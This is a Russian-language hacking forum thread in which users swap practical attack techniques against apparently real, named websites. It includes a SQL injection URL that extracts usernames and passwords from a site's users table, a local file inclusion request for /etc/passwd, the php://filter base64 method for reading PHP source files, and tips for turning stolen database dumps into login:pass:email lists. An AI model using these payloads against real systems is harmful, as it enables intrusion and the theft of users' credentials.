жжёшь, ты читал хоть что-то? _http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+aawowinf_mrlink.users
Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй... Ошибаешься.
Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду? _http://mysql.infobox.ru/server_databases.php _http://mysql.infobox.ru/
2LokbatanLi искать какуюнить читалку файлов, т.к. пасс почти всегда храниться в файле. Вот например есть инклуд Code: http://www.route66.com.ua/index.php?c=/etc/passwd когда пытаюсь прочитать какойнить файл с диры сайта например Code: http://www.route66.com.ua/index.php?c=config.php то сурсов его невижу, почему он делает так а неиначе и есть ли способ это обойти?
Может кто сталкивался- после дампа базы нужно сделать выборку только определенных столбцов и таблиц. Например, нужны Code: login:pass:email или только Code: login:pass Замучился чистить руками от мусора- id и т.п. Что используете для этого?
если контролируется начало значения, которое попадает в include(), то возможно: php://filter/read/resource=script.php
Code: Нет никакого скриптика? нет и по идее быть не может универсального, кроме как для хешей и емайлов
2 Komyak Если у тебя есть дамп, то проще всего я думаю сделать выборку на своей машине. Ставь наборчик типа "Денвер" заливай дамп в базу. А потом делай выборку вроде "select concat(login,':',pass,':',email) from userz into outfile 'c:\damp.txt' " все сольется в файл.
просто там нету этого файла , поэтому он тебе не выдает ни чего ЗЫ там вообще RFI (((жаль токо отключена функция allow_url_include
Нифига, так ты файл только выполнишь, а читать надо так: Code: http://localhost/1.php?a=php://filter/convert.base64-encode/resource=1.php А потом декодить
